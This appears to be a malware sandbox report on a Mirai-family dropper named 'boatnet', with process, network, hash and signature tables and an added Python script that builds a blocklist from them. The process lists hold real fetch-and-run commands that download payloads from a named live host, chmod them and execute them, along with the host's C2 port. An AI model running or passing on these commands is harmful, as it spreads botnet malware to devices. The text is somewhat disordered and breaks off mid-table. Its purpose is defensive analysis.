| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
memory/1536-1-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1544-2-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1552-3-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1560-4-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1568-5-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1576-6-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1584-7-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1592-8-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1600-9-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1608-10-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1622-11-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1632-12-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1644-13-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1660-14-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1680-15-0x0000000008048000-0x00000000080547a0-memory.dmp
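The process list above shows the dropper cycling through fifteen payload variants (one wget and one curl fetch of http://77.221.151.63/hiddenbin/boatnet.<arch> per architecture suffix, then chmod +x on everything in /tmp and ./WTF), and the network table shows the port-80 fetches followed by repeated connections to 77.221.151.63:3778. The script below is an added example, not part of the sandbox output, that turns those two sections into a blocklist. It embeds a constructed subset of the page's own rows, copes with the shifted Proto column of the original network table (rows with no Domain value carry the protocol in the Domain cell), and keeps the download host separate from destinations the page does not attribute: the mDNS multicast address and the :443 hosts have no domain and no originating process listed, so they are treated as candidates for review rather than blocked outright (the assumption being that they may be platform background traffic).

```python
"""Build a blocklist from the Processes and Network sections of the report.

Added example; the excerpts are a constructed subset of the page's rows.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed excerpt of the Processes section (same line shapes as the page).
PROCESS_EXCERPT = """\
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
"""

# Constructed excerpt of the Network table, including the shifted-column
# rows and the unterminated last row exactly as they appear in the report.
NETWORK_EXCERPT = """\
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp
"""

URL_RE = re.compile(r"https?://[^\s\]]+")


def extract_urls(process_text):
    """Every URL requested by any recorded command line, de-duplicated."""
    return sorted(set(URL_RE.findall(process_text)))


def payload_variants(urls):
    """Architecture suffixes of the staged payloads ('boatnet.x86' -> 'x86')."""
    return sorted({urlsplit(u).path.rsplit(".", 1)[-1] for u in urls})


def parse_network_rows(network_text):
    """Count (destination, proto) pairs; tolerates the shifted Proto column."""
    counts = Counter()
    for line in network_text.splitlines()[1:]:          # skip header row
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3:
            continue
        dest = cells[1]
        # Well-formed row: proto in cell 3. Shifted row: cell 3 empty or
        # absent and the proto sits in the Domain cell (cell 2).
        proto = cells[3] if len(cells) > 3 and cells[3] else cells[2]
        if proto not in ("tcp", "udp"):
            continue
        counts[(dest, proto)] += 1
    return counts


def build_blocklist(process_text, network_text):
    urls = extract_urls(process_text)
    hosts = {urlsplit(u).hostname for u in urls}        # hosts the dropper fetched from
    dests = parse_network_rows(network_text)
    # Block the download host on every port it was contacted on (80 for the
    # fetches, 3778 afterwards); hand unattributed destinations to review.
    block = {d for (d, _proto) in dests if d.split(":")[0] in hosts}
    review = {d for (d, _proto) in dests if d.split(":")[0] not in hosts}
    return {"urls": urls, "variants": payload_variants(urls),
            "block": sorted(block), "review": sorted(review), "counts": dests}


if __name__ == "__main__":
    result = build_blocklist(PROCESS_EXCERPT, NETWORK_EXCERPT)
    for key in ("urls", "variants", "block", "review"):
        print(key, result[key])
```

Run against the full Processes and Network sections the same functions yield fifteen payload URLs (arc, arm, arm5, arm6, arm7, i468, i686, m68k, mips, mpsl, ppc, sh4, spc, x86, x86_64) and put 77.221.151.63 on ports 80 and 3778 on the blocklist; the /tmp/boatnet.x86 hashes listed under Files can be added to the same feed by hand.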
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
debian9-armhf-20240418-en
Max time kernel
139s
Max time network
144s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/636/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/588/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/862/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/822/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/809/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/639/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/767/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/848/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/586/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/644/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/830/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/856/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/631/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/829/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/846/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/588/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/exe | /tmp/WTF | N/A |
| File opened for reading | /proc/573/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/637/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/854/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/638/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/673/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/816/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/862/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/exe | /tmp/WTF | N/A |
| File opened for reading | /proc/637/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/807/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/673/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/850/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/854/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/636/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/638/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/809/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/844/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/846/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/639/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/573/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/594/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/594/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
memory/763-1-0x00008000-0x0001dca4-memory.dmp
memory/784-2-0x00008000-0x0001b6e4-memory.dmp
memory/801-3-0x00008000-0x000228c4-memory.dmp
memory/806-4-0x00008000-0x00026464-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
debian9-mipsbe-20240611-en
Max time kernel
148s
Max time network
141s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
